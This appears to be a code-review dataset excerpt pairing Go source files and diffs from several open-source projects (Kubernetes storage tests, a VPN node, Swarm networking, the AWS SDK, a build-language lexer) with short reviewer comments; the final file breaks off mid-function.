metav1.GetOptions{}) return isNotFound(err) }, 60, 10). Should(BeTrue()) } // GetPVNameFromPVCName gives the pv name for the given pvc func (ops *Operations) GetPVNameFromPVCName(pvcName string) string { p, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return p.Spec.VolumeName } // isNotFound returns true if the original // cause of error was due to castemplate's // not found error or kubernetes not found // error func isNotFound(err error) bool { switch err := errors.Cause(err).(type) { case *templatefuncs.NotFoundError: return true default: return k8serrors.IsNotFound(err) } } // DeleteCSP ... func (ops *Operations) DeleteCSP(spcName string, deleteCount int) { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspList := csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")) cspCount := cspList.Len() Expect(deleteCount).Should(BeNumerically("<=", cspCount)) for i := 0; i < deleteCount; i++ { _, err := ops.CSPClient.Delete(cspList.ObjectList.Items[i].Name, &metav1.DeleteOptions{}) Expect(err).To(BeNil()) } } // GetCSPCount gets csp count based on spcName func (ops *Operations) GetCSPCount(spcName string, expectedCSPCount int) int { var cspCount int for i := 0; i < maxRetry; i++ { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspCount = csp. ListBuilderForAPIObject(cspAPIList). List(). Len() if cspCount == expectedCSPCount { return cspCount } time.Sleep(5 * time.Second) } return cspCount } // GetHealthyCSPCount gets healthy csp based on spcName func (ops *Operations) GetHealthyCSPCount(spcName string, expectedCSPCount int) int { var cspCount int for i := 0; i < maxRetry; i++ { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) cspCount = csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")). Len() if cspCount == expectedCSPCount { return cspCount } time.Sleep(5 * time.Second) } return cspCount } // GetHealthyCSPCountEventually gets healthy csp based on spcName func (ops *Operations) GetHealthyCSPCountEventually(spcName string, expectedCSPCount int) bool { return Eventually(func() int { cspAPIList, err := ops.CSPClient.List(metav1.ListOptions{}) Expect(err).To(BeNil()) count := csp. ListBuilderForAPIObject(cspAPIList). List(). Filter(csp.HasLabel(string(apis.StoragePoolClaimCPK), spcName), csp.IsStatus("Healthy")). Len() return count }, 60, 10). Should(Equal(expectedCSPCount)) } // ExecPod executes arbitrary command inside the pod func (ops *Operations) ExecPod(opts *Options) ([]byte, error) { var ( execOut bytes.Buffer execErr bytes.Buffer err error ) By("getting rest config") config, err := ops.KubeClient.GetConfigForPathOrDirect() Expect(err).To(BeNil(), "while getting config for exec'ing into pod") By("getting clientset") cset, err := ops.KubeClient.Clientset() Expect(err).To(BeNil(), "while getting clientset for exec'ing into pod") req := cset. CoreV1(). RESTClient(). Post(). Resource("pods"). Name(opts.podName). Namespace(opts.namespace). SubResource("exec"). Param("container", opts.container). VersionedParams(&corev1.PodExecOptions{ Container: opts.container, Command: opts.cmd, Stdin: false, Stdout: true, Stderr: true, TTY: false, }, scheme.ParameterCodec) By("creating a POST request for executing command") exec, err := remotecommand.NewSPDYExecutor(config, "POST", req.URL()) Expect(err).To(BeNil(), "while exec'ing command in pod ", opts.podName) By("processing request") err = exec.Stream(remotecommand.StreamOptions{ Stdout: &execOut, Stderr: &execErr, Tty: false, }) Expect(err).To(BeNil(), "while streaming the command in pod ", opts.podName, execOut.String(), execErr.String()) Expect(execOut.Len()).Should(BeNumerically(">", 0), "while streaming the command in pod ", opts.podName, execErr.String(), execOut.String()) return execOut.Bytes(), nil } // GetPodCompletedCountEventually gives the number of pods running eventually func (ops *Operations) GetPodCompletedCountEventually(namespace, lselector string, expectedPodCount int) int { var podCount int for i := 0; i < maxRetry; i++ { podCount = ops.GetPodCompletedCount(namespace, lselector) if podCount == expectedPodCount { return podCount } time.Sleep(5 * time.Second) } return podCount } // GetPodCompletedCount gives number of pods running currently func (ops *Operations) GetPodCompletedCount(namespace, lselector string) int { pods, err := ops.PodClient. WithNamespace(namespace). List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return pod. ListBuilderForAPIList(pods). WithFilter(pod.IsCompleted()). List(). Len() } // VerifyUpgradeResultTasksIsNotFail checks whether all the tasks in upgraderesult // have success func (ops *Operations) VerifyUpgradeResultTasksIsNotFail(namespace, lselector string) bool { urList, err := ops.URClient. WithNamespace(namespace). List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) for _, task := range urList.Items[0].Tasks { if task.Status == "Fail" { fmt.Printf("task : %v\n", task) return false } } return true }
1
16,334
I am not sure what is 120 and what is 10. Hence unable to review.
openebs-maya
go
@@ -47,8 +47,9 @@ type Options struct { Location OptionsLocation Transactor OptionsTransactor - Openvpn Openvpn - Firewall OptionsFirewall + EnableDNS bool + Openvpn Openvpn + Firewall OptionsFirewall } // OptionsKeystore stores the keystore configuration
1
/* * Copyright (C) 2018 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package node import "github.com/mysteriumnetwork/node/logconfig" // Openvpn interface is abstraction over real openvpn options to unblock mobile development // will disappear as soon as go-openvpn will unify common factory for openvpn creation type Openvpn interface { Check() error BinaryPath() string } // Options describes options which are required to start Node type Options struct { Directories OptionsDirectory TequilapiAddress string TequilapiPort int BindAddress string UI OptionsUI DisableMetrics bool MetricsAddress string Keystore OptionsKeystore logconfig.LogOptions OptionsNetwork Discovery OptionsDiscovery Quality OptionsQuality Location OptionsLocation Transactor OptionsTransactor Openvpn Openvpn Firewall OptionsFirewall } // OptionsKeystore stores the keystore configuration type OptionsKeystore struct { UseLightweight bool }
1
14,889
Not needed anymore
mysteriumnetwork-node
go
@@ -2,6 +2,8 @@ // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. +// Package pingpong exposes the simple ping-pong protocol +// which measures RTT with other peers. package pingpong import (
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package pingpong import ( "context" "fmt" "io" "time" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/pingpong/pb" "github.com/ethersphere/bee/pkg/swarm" "github.com/ethersphere/bee/pkg/tracing" ) const ( protocolName = "pingpong" protocolVersion = "1.0.0" streamName = "pingpong" ) type Interface interface { Ping(ctx context.Context, address swarm.Address, msgs ...string) (rtt time.Duration, err error) } type Service struct { streamer p2p.Streamer logger logging.Logger tracer *tracing.Tracer metrics metrics } func New(streamer p2p.Streamer, logger logging.Logger, tracer *tracing.Tracer) *Service { return &Service{ streamer: streamer, logger: logger, tracer: tracer, metrics: newMetrics(), } } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: streamName, Handler: s.handler, }, }, } } func (s *Service) Ping(ctx context.Context, address swarm.Address, msgs ...string) (rtt time.Duration, err error) { span, logger, ctx := s.tracer.StartSpanFromContext(ctx, "pingpong-p2p-ping", s.logger) defer span.Finish() start := time.Now() stream, err := s.streamer.NewStream(ctx, address, nil, protocolName, protocolVersion, streamName) if err != nil { return 0, fmt.Errorf("new stream: %w", err) } defer func() { go stream.FullClose() }() w, r := protobuf.NewWriterAndReader(stream) var pong pb.Pong for _, msg := range msgs { if err := w.WriteMsgWithContext(ctx, &pb.Ping{ Greeting: msg, }); err != nil { return 0, fmt.Errorf("write message: %w", err) } s.metrics.PingSentCount.Inc() if err := r.ReadMsgWithContext(ctx, &pong); err != nil { if err == io.EOF { break } return 0, fmt.Errorf("read message: %w", err) } logger.Tracef("got pong: %q", pong.Response) s.metrics.PongReceivedCount.Inc() } return time.Since(start), nil } func (s *Service) handler(ctx context.Context, p p2p.Peer, stream p2p.Stream) error { w, r := protobuf.NewWriterAndReader(stream) defer stream.FullClose() span, logger, ctx := s.tracer.StartSpanFromContext(ctx, "pingpong-p2p-handler", s.logger) defer span.Finish() var ping pb.Ping for { if err := r.ReadMsgWithContext(ctx, &ping); err != nil { if err == io.EOF { break } return fmt.Errorf("read message: %w", err) } logger.Tracef("got ping: %q", ping.Greeting) s.metrics.PingReceivedCount.Inc() if err := w.WriteMsgWithContext(ctx, &pb.Pong{ Response: "{" + ping.Greeting + "}", }); err != nil { return fmt.Errorf("write message: %w", err) } s.metrics.PongSentCount.Inc() } return nil }
1
13,694
Please not abbreviations
ethersphere-bee
go
@@ -199,6 +199,10 @@ var ValidateResponseHandler = request.NamedHandler{Name: "core.ValidateResponseH // AfterRetryHandler performs final checks to determine if the request should // be retried and how long to delay. var AfterRetryHandler = request.NamedHandler{Name: "core.AfterRetryHandler", Fn: func(r *request.Request) { + if !aws.IsReaderSeekable(r.Body) { + r.Retryable = aws.Bool(false) + } + // If one of the other handlers already set the retry state // we don't want to override it based on the service's state if r.Retryable == nil || aws.BoolValue(r.Config.EnforceShouldRetryCheck) {
1
package corehandlers import ( "bytes" "fmt" "io" "io/ioutil" "net/http" "net/url" "regexp" "runtime" "strconv" "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" "github.com/aws/aws-sdk-go/aws/credentials" "github.com/aws/aws-sdk-go/aws/request" ) // Interface for matching types which also have a Len method. type lener interface { Len() int } // BuildContentLengthHandler builds the content length of a request based on the body, // or will use the HTTPRequest.Header's "Content-Length" if defined. If unable // to determine request body length and no "Content-Length" was specified it will panic. // // The Content-Length will only be added to the request if the length of the body // is greater than 0. If the body is empty or the current `Content-Length` // header is <= 0, the header will also be stripped. var BuildContentLengthHandler = request.NamedHandler{Name: "core.BuildContentLengthHandler", Fn: func(r *request.Request) { var length int64 if slength := r.HTTPRequest.Header.Get("Content-Length"); slength != "" { length, _ = strconv.ParseInt(slength, 10, 64) } else { switch body := r.Body.(type) { case nil: length = 0 case lener: length = int64(body.Len()) case io.Seeker: r.BodyStart, _ = body.Seek(0, 1) end, _ := body.Seek(0, 2) body.Seek(r.BodyStart, 0) // make sure to seek back to original location length = end - r.BodyStart default: panic("Cannot get length of body, must provide `ContentLength`") } } if length > 0 { r.HTTPRequest.ContentLength = length r.HTTPRequest.Header.Set("Content-Length", fmt.Sprintf("%d", length)) } else { r.HTTPRequest.ContentLength = 0 r.HTTPRequest.Header.Del("Content-Length") } }} // SDKVersionUserAgentHandler is a request handler for adding the SDK Version to the user agent. var SDKVersionUserAgentHandler = request.NamedHandler{ Name: "core.SDKVersionUserAgentHandler", Fn: request.MakeAddToUserAgentHandler(aws.SDKName, aws.SDKVersion, runtime.Version(), runtime.GOOS, runtime.GOARCH), } var reStatusCode = regexp.MustCompile(`^(\d{3})`) // ValidateReqSigHandler is a request handler to ensure that the request's // signature doesn't expire before it is sent. This can happen when a request // is built and signed significantly before it is sent. Or significant delays // occur when retrying requests that would cause the signature to expire. var ValidateReqSigHandler = request.NamedHandler{ Name: "core.ValidateReqSigHandler", Fn: func(r *request.Request) { // Unsigned requests are not signed if r.Config.Credentials == credentials.AnonymousCredentials { return } signedTime := r.Time if !r.LastSignedAt.IsZero() { signedTime = r.LastSignedAt } // 10 minutes to allow for some clock skew/delays in transmission. // Would be improved with aws/aws-sdk-go#423 if signedTime.Add(10 * time.Minute).After(time.Now()) { return } fmt.Println("request expired, resigning") r.Sign() }, } // SendHandler is a request handler to send service request using HTTP client. var SendHandler = request.NamedHandler{ Name: "core.SendHandler", Fn: func(r *request.Request) { sender := sendFollowRedirects if r.DisableFollowRedirects { sender = sendWithoutFollowRedirects } if request.NoBody == r.HTTPRequest.Body { // Strip off the request body if the NoBody reader was used as a // place holder for a request body. This prevents the SDK from // making requests with a request body when it would be invalid // to do so. // // Use a shallow copy of the http.Request to ensure the race condition // of transport on Body will not trigger reqOrig, reqCopy := r.HTTPRequest, *r.HTTPRequest reqCopy.Body = nil r.HTTPRequest = &reqCopy defer func() { r.HTTPRequest = reqOrig }() } var err error r.HTTPResponse, err = sender(r) if err != nil { handleSendError(r, err) } }, } func sendFollowRedirects(r *request.Request) (*http.Response, error) { return r.Config.HTTPClient.Do(r.HTTPRequest) } func sendWithoutFollowRedirects(r *request.Request) (*http.Response, error) { transport := r.Config.HTTPClient.Transport if transport == nil { transport = http.DefaultTransport } return transport.RoundTrip(r.HTTPRequest) } func handleSendError(r *request.Request, err error) { // Prevent leaking if an HTTPResponse was returned. Clean up // the body. if r.HTTPResponse != nil { r.HTTPResponse.Body.Close() } // Capture the case where url.Error is returned for error processing // response. e.g. 301 without location header comes back as string // error and r.HTTPResponse is nil. Other URL redirect errors will // comeback in a similar method. if e, ok := err.(*url.Error); ok && e.Err != nil { if s := reStatusCode.FindStringSubmatch(e.Err.Error()); s != nil { code, _ := strconv.ParseInt(s[1], 10, 64) r.HTTPResponse = &http.Response{ StatusCode: int(code), Status: http.StatusText(int(code)), Body: ioutil.NopCloser(bytes.NewReader([]byte{})), } return } } if r.HTTPResponse == nil { // Add a dummy request response object to ensure the HTTPResponse // value is consistent. r.HTTPResponse = &http.Response{ StatusCode: int(0), Status: http.StatusText(int(0)), Body: ioutil.NopCloser(bytes.NewReader([]byte{})), } } // Catch all other request errors. r.Error = awserr.New("RequestError", "send request failed", err) r.Retryable = aws.Bool(true) // network errors are retryable // Override the error with a context canceled error, if that was canceled. ctx := r.Context() select { case <-ctx.Done(): r.Error = awserr.New(request.CanceledErrorCode, "request context canceled", ctx.Err()) r.Retryable = aws.Bool(false) default: } } // ValidateResponseHandler is a request handler to validate service response. var ValidateResponseHandler = request.NamedHandler{Name: "core.ValidateResponseHandler", Fn: func(r *request.Request) { if r.HTTPResponse.StatusCode == 0 || r.HTTPResponse.StatusCode >= 300 { // this may be replaced by an UnmarshalError handler r.Error = awserr.New("UnknownError", "unknown error", nil) } }} // AfterRetryHandler performs final checks to determine if the request should // be retried and how long to delay. var AfterRetryHandler = request.NamedHandler{Name: "core.AfterRetryHandler", Fn: func(r *request.Request) { // If one of the other handlers already set the retry state // we don't want to override it based on the service's state if r.Retryable == nil || aws.BoolValue(r.Config.EnforceShouldRetryCheck) { r.Retryable = aws.Bool(r.ShouldRetry(r)) } if r.WillRetry() { r.RetryDelay = r.RetryRules(r) if sleepFn := r.Config.SleepDelay; sleepFn != nil { // Support SleepDelay for backwards compatibility and testing sleepFn(r.RetryDelay) } else if err := aws.SleepWithContext(r.Context(), r.RetryDelay); err != nil { r.Error = awserr.New(request.CanceledErrorCode, "request context canceled", err) r.Retryable = aws.Bool(false) return } // when the expired token exception occurs the credentials // need to be expired locally so that the next request to // get credentials will trigger a credentials refresh. if r.IsErrorExpired() { r.Config.Credentials.Expire() } r.RetryCount++ r.Error = nil } }} // ValidateEndpointHandler is a request handler to validate a request had the // appropriate Region and Endpoint set. Will set r.Error if the endpoint or // region is not valid. var ValidateEndpointHandler = request.NamedHandler{Name: "core.ValidateEndpointHandler", Fn: func(r *request.Request) { if r.ClientInfo.SigningRegion == "" && aws.StringValue(r.Config.Region) == "" { r.Error = aws.ErrMissingRegion } else if r.ClientInfo.Endpoint == "" { r.Error = aws.ErrMissingEndpoint } }}
1
9,081
This shouldn't get stomped over on line 207
aws-aws-sdk-go
go
@@ -37,6 +37,7 @@ func (tok Token) String() string { } // A Position describes a position in a source file. +// All properties in Position are zero indexed type Position struct { Filename string Offset int
1
package asp import ( "io" "io/ioutil" "unicode" "unicode/utf8" ) // Token types. const ( EOF = -(iota + 1) Ident Int String LexOperator EOL Unindent ) // A Token describes each individual lexical element emitted by the lexer. type Token struct { // Type of token. If > 0 this is the literal character value; if < 0 it is one of the types above. Type rune // The literal text of the token. Strings are lightly normalised to always be surrounded by quotes (but only one). Value string // The position in the input that the token occurred at. Pos Position } // String implements the fmt.Stringer interface func (tok Token) String() string { if tok.Value != "" { return tok.Value } return reverseSymbol(tok.Type) } // A Position describes a position in a source file. type Position struct { Filename string Offset int Line int Column int } type namer interface { Name() string } // NameOfReader returns a name for the given reader, if one can be determined. func NameOfReader(r io.Reader) string { if n, ok := r.(namer); ok { return n.Name() } return "" } // newLexer creates a new lex instance. func newLexer(r io.Reader) *lex { // Read the entire file upfront to avoid bufio etc. // This should work OK as long as BUILD files are relatively small. b, err := ioutil.ReadAll(r) if err != nil { fail(Position{Filename: NameOfReader(r)}, err.Error()) } // If the file doesn't end in a newline, we will reject it with an "unexpected end of file" // error. That's a bit crap so quietly fix it up here. if len(b) > 0 && b[len(b)-1] != '\n' { b = append(b, '\n') } l := &lex{ b: append(b, 0, 0), // Null-terminating the buffer makes things easier later. filename: NameOfReader(r), indents: []int{0}, } l.Next() // Initial value is zero, this forces it to populate itself. // Discard any leading newlines, they are just an annoyance. for l.Peek().Type == EOL { l.Next() } return l } // A lex is a lexer for a single BUILD file. type lex struct { b []byte i int line int col int indent int // The next token. We always look one token ahead in order to facilitate both Peek() and Next(). next Token filename string // Used to track how many braces we're within. braces int // Pending unindent tokens. This is a bit yuck but means the parser doesn't need to // concern itself about indentation. unindents int // Current levels of indentation indents []int // Remember whether the last token we output was an end-of-line so we don't emit multiple in sequence. lastEOL bool } // reverseSymbol looks up a symbol's name from the lexer. func reverseSymbol(sym rune) string { switch sym { case EOF: return "end of file" case Ident: return "identifier" case Int: return "integer" case String: return "string" case LexOperator: return "operator" case EOL: return "end of line" case Unindent: return "unindent" } return string(sym) // literal character } // reverseSymbols looks up a series of symbol's names from the lexer. func reverseSymbols(syms []rune) []string { ret := make([]string, len(syms)) for i, sym := range syms { ret[i] = reverseSymbol(sym) } return ret } // Peek at the next token func (l *lex) Peek() Token { return l.next } // Next consumes and returns the next token. func (l *lex) Next() Token { ret := l.next l.next = l.nextToken() l.lastEOL = l.next.Type == EOL || l.next.Type == Unindent return ret } // AssignFollows is a hack to do extra lookahead which makes it easier to parse // named call arguments. It returns true if the token after next is an assign operator. func (l *lex) AssignFollows() bool { l.stripSpaces() return l.b[l.i] == '=' && l.b[l.i+1] != '=' } func (l *lex) stripSpaces() { for l.b[l.i] == ' ' { l.i++ l.col++ } } // nextToken consumes and returns the next token. func (l *lex) nextToken() Token { l.stripSpaces() pos := Position{ Filename: l.filename, // These are all 1-indexed for niceness. Offset: l.i + 1, Line: l.line + 1, Column: l.col + 1, } if l.unindents > 0 { l.unindents-- return Token{Type: Unindent, Pos: pos} } b := l.b[l.i] rawString := b == 'r' && (l.b[l.i+1] == '"' || l.b[l.i+1] == '\'') fString := b == 'f' && (l.b[l.i+1] == '"' || l.b[l.i+1] == '\'') if rawString || fString { l.i++ l.col++ b = l.b[l.i] } else if (b >= 'a' && b <= 'z') || (b >= 'A' && b <= 'Z') || b == '_' || b >= utf8.RuneSelf { return l.consumeIdent(pos) } l.i++ l.col++ switch b { case 0: // End of file (we null terminate it above so this is easy to spot) return Token{Type: EOF, Pos: pos} case '\n': // End of line, read indent to next non-space character lastIndent := l.indent l.line++ l.col = 0 indent := 0 for l.b[l.i] == ' ' { l.i++ l.col++ indent++ } if l.b[l.i] == '\n' { return l.nextToken() } if l.braces == 0 { l.indent = indent } if lastIndent > l.indent && l.braces == 0 { pos.Line++ // Works better if it's at the new position pos.Column = l.col + 1 for l.indents[len(l.indents)-1] > l.indent { l.unindents++ l.indents = l.indents[:len(l.indents)-1] } if l.indent != l.indents[len(l.indents)-1] { fail(pos, "Unexpected indent") } } else if lastIndent != l.indent { l.indents = append(l.indents, l.indent) } if l.braces == 0 && !l.lastEOL { return Token{Type: EOL, Pos: pos} } return l.nextToken() case '0', '1', '2', '3', '4', '5', '6', '7', '8', '9': return l.consumeInteger(b, pos) case '"', '\'': // String literal, consume to end. return l.consumePossiblyTripleQuotedString(b, pos, rawString, fString) case '(', '[', '{': l.braces++ return Token{Type: rune(b), Value: string(b), Pos: pos} case ')', ']', '}': if l.braces > 0 { // Don't let it go negative, it fouls things up l.braces-- } return Token{Type: rune(b), Value: string(b), Pos: pos} case '=', '!', '+', '<', '>': // Look ahead one byte to see if this is an augmented assignment or comparison. if l.b[l.i] == '=' { l.i++ l.col++ return Token{Type: LexOperator, Value: string([]byte{b, l.b[l.i-1]}), Pos: pos} } fallthrough case ',', '.', '%', '*', '|', '&', ':': return Token{Type: rune(b), Value: string(b), Pos: pos} case '#': // Comment character, consume to end of line. for l.b[l.i] != '\n' && l.b[l.i] != 0 { l.i++ l.col++ } return l.nextToken() // Comments aren't tokens themselves. case '-': // We lex unary - with the integer if possible. if l.b[l.i] >= '0' && l.b[l.i] <= '9' { return l.consumeInteger(b, pos) } return Token{Type: rune(b), Value: string(b), Pos: pos} case '\t': fail(pos, "Tabs are not permitted in BUILD files, use space-based indentation instead") default: fail(pos, "Unknown symbol %c", b) } panic("unreachable") } // consumeInteger consumes all characters until the end of an integer literal is reached. func (l *lex) consumeInteger(initial byte, pos Position) Token { s := make([]byte, 1, 10) s[0] = initial for c := l.b[l.i]; c >= '0' && c <= '9'; c = l.b[l.i] { l.i++ l.col++ s = append(s, c) } return Token{Type: Int, Value: string(s), Pos: pos} } // consumePossiblyTripleQuotedString consumes all characters until the end of a string token. func (l *lex) consumePossiblyTripleQuotedString(quote byte, pos Position, raw, fString bool) Token { if l.b[l.i] == quote && l.b[l.i+1] == quote { l.i += 2 // Jump over initial quote l.col += 2 return l.consumeString(quote, pos, true, raw, fString) } return l.consumeString(quote, pos, false, raw, fString) } // consumeString consumes all characters until the end of a string literal is reached. func (l *lex) consumeString(quote byte, pos Position, multiline, raw, fString bool) Token { s := make([]byte, 1, 100) // 100 chars is typically enough for a single string literal. s[0] = '"' escaped := false for { c := l.b[l.i] l.i++ l.col++ if escaped { if c == 'n' { s = append(s, '\n') } else if c == '\n' && multiline { l.line++ l.col = 0 } else if c == '\\' || c == '\'' || c == '"' { s = append(s, c) } else { s = append(s, '\\', c) } escaped = false continue } switch c { case quote: s = append(s, '"') if !multiline || (l.b[l.i] == quote && l.b[l.i+1] == quote) { if multiline { l.i += 2 l.col += 2 } token := Token{Type: String, Value: string(s), Pos: pos} if fString { token.Value = "f" + token.Value } if l.braces > 0 { return l.handleImplicitStringConcatenation(token) } return token } case '\n': if multiline { l.line++ l.col = 0 s = append(s, c) continue } fallthrough case 0: fail(pos, "Unterminated string literal") case '\\': if !raw { escaped = true continue } fallthrough default: s = append(s, c) } } } // handleImplicitStringConcatenation looks ahead after a string token and checks if the next token will be a string; if so // we collapse them both into one string now. func (l *lex) handleImplicitStringConcatenation(token Token) Token { col := l.col line := l.line for i, b := range l.b[l.i:] { switch b { case '\n': col = 0 line++ continue case ' ': col++ continue case '"', '\'': l.i += i + 1 l.col = col + 1 l.line = line // Note that we don't handle raw or format strings here. Anecdotally, that seems relatively rare... tok := l.consumePossiblyTripleQuotedString(b, token.Pos, false, false) token.Value = token.Value[:len(token.Value)-1] + tok.Value[1:] return token default: return token } } return token } // consumeIdent consumes all characters of an identifier. func (l *lex) consumeIdent(pos Position) Token { s := make([]rune, 0, 100) for { c := rune(l.b[l.i]) if c >= utf8.RuneSelf { // Multi-byte encoded in utf-8. r, n := utf8.DecodeRune(l.b[l.i:]) c = r l.i += n l.col += n if !unicode.IsLetter(c) && !unicode.IsDigit(c) { fail(pos, "Illegal Unicode identifier %c", c) } s = append(s, c) continue } l.i++ l.col++ switch c { case ' ': // End of identifier, but no unconsuming needed. return Token{Type: Ident, Value: string(s), Pos: pos} case '_', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9': s = append(s, c) default: // End of identifier. Unconsume the last character so it gets handled next time. l.i-- l.col-- return Token{Type: Ident, Value: string(s), Pos: pos} } } }
1
8,432
are they not 1-indexed?
thought-machine-please
go
@@ -272,7 +272,7 @@ func (s *Service) Pay(ctx context.Context, peer swarm.Address, amount, checkAllo } currentTime := s.timeNow().Unix() - if currentTime == lastTime.CheckTimestamp { + if currentTime == lastTime.CheckTimestamp || currentTime == lastTime.Timestamp { return nil, 0, ErrSettlementTooSoon }
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package pseudosettle import ( "context" "errors" "fmt" "math/big" "strings" "sync" "time" "github.com/ethersphere/bee/pkg/logging" "github.com/ethersphere/bee/pkg/p2p" "github.com/ethersphere/bee/pkg/p2p/protobuf" "github.com/ethersphere/bee/pkg/settlement" pb "github.com/ethersphere/bee/pkg/settlement/pseudosettle/pb" "github.com/ethersphere/bee/pkg/storage" "github.com/ethersphere/bee/pkg/swarm" ) const ( protocolName = "pseudosettle" protocolVersion = "1.0.0" streamName = "pseudosettle" ) var ( SettlementReceivedPrefix = "pseudosettle_total_received_" SettlementSentPrefix = "pseudosettle_total_sent_" ErrSettlementTooSoon = errors.New("settlement too soon") ErrNoPseudoSettlePeer = errors.New("settlement peer not found") ErrDisconnectAllowanceCheckFailed = errors.New("settlement allowance below enforced amount") ErrTimeOutOfSync = errors.New("settlement allowance timestamps differ beyond tolerance") ) type Service struct { streamer p2p.Streamer logger logging.Logger store storage.StateStorer accounting settlement.Accounting metrics metrics refreshRate *big.Int lightRefreshRate *big.Int p2pService p2p.Service timeNow func() time.Time peersMu sync.Mutex peers map[string]*pseudoSettlePeer } type pseudoSettlePeer struct { lock sync.Mutex // lock to be held during receiving a payment from this peer fullNode bool } type lastPayment struct { Timestamp int64 CheckTimestamp int64 Total *big.Int } func New(streamer p2p.Streamer, logger logging.Logger, store storage.StateStorer, accounting settlement.Accounting, refreshRate, lightRefreshRate *big.Int, p2pService p2p.Service) *Service { return &Service{ streamer: streamer, logger: logger, metrics: newMetrics(), store: store, accounting: accounting, p2pService: p2pService, refreshRate: refreshRate, lightRefreshRate: lightRefreshRate, timeNow: time.Now, peers: make(map[string]*pseudoSettlePeer), } } func (s *Service) Protocol() p2p.ProtocolSpec { return p2p.ProtocolSpec{ Name: protocolName, Version: protocolVersion, StreamSpecs: []p2p.StreamSpec{ { Name: streamName, Handler: s.handler, }, }, ConnectIn: s.init, ConnectOut: s.init, DisconnectIn: s.terminate, DisconnectOut: s.terminate, } } func (s *Service) init(ctx context.Context, p p2p.Peer) error { s.peersMu.Lock() defer s.peersMu.Unlock() _, ok := s.peers[p.Address.String()] if !ok { peerData := &pseudoSettlePeer{fullNode: p.FullNode} s.peers[p.Address.String()] = peerData } go s.accounting.Connect(p.Address) return nil } func (s *Service) terminate(p p2p.Peer) error { s.peersMu.Lock() defer s.peersMu.Unlock() delete(s.peers, p.Address.String()) go s.accounting.Disconnect(p.Address) return nil } func totalKey(peer swarm.Address, prefix string) string { return fmt.Sprintf("%v%v", prefix, peer.String()) } func totalKeyPeer(key []byte, prefix string) (peer swarm.Address, err error) { k := string(key) split := strings.SplitAfter(k, prefix) if len(split) != 2 { return swarm.ZeroAddress, errors.New("no peer in key") } return swarm.ParseHexAddress(split[1]) } // peerAllowance computes the maximum incoming payment value we accept // this is the time based allowance or the peers actual debt, whichever is less func (s *Service) peerAllowance(peer swarm.Address, fullNode bool) (limit *big.Int, stamp int64, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, 0, err } lastTime.Timestamp = int64(0) } currentTime := s.timeNow().Unix() if currentTime == lastTime.Timestamp { return nil, 0, ErrSettlementTooSoon } var refreshRateUsed *big.Int if fullNode { refreshRateUsed = s.refreshRate } else { refreshRateUsed = s.lightRefreshRate } maxAllowance := new(big.Int).Mul(big.NewInt(currentTime-lastTime.Timestamp), refreshRateUsed) peerDebt, err := s.accounting.PeerDebt(peer) if err != nil { return nil, 0, err } if peerDebt.Cmp(maxAllowance) >= 0 { return maxAllowance, currentTime, nil } return peerDebt, currentTime, nil } func (s *Service) handler(ctx context.Context, p p2p.Peer, stream p2p.Stream) (err error) { w, r := protobuf.NewWriterAndReader(stream) defer func() { if err != nil { _ = stream.Reset() s.metrics.ReceivedPseudoSettlementsErrors.Inc() } else { go stream.FullClose() } }() var req pb.Payment if err := r.ReadMsgWithContext(ctx, &req); err != nil { return fmt.Errorf("read request from peer %v: %w", p.Address, err) } attemptedAmount := big.NewInt(0).SetBytes(req.Amount) paymentAmount := new(big.Int).Set(attemptedAmount) s.peersMu.Lock() pseudoSettlePeer, ok := s.peers[p.Address.String()] s.peersMu.Unlock() if !ok { return ErrNoPseudoSettlePeer } pseudoSettlePeer.lock.Lock() defer pseudoSettlePeer.lock.Unlock() allowance, timestamp, err := s.peerAllowance(p.Address, pseudoSettlePeer.fullNode) if err != nil { return err } if allowance.Cmp(attemptedAmount) < 0 { paymentAmount.Set(allowance) s.logger.Tracef("pseudosettle accepting reduced payment from peer %v of %d", p.Address, paymentAmount) } else { s.logger.Tracef("pseudosettle accepting payment message from peer %v of %d", p.Address, paymentAmount) } if paymentAmount.Cmp(big.NewInt(0)) < 0 { 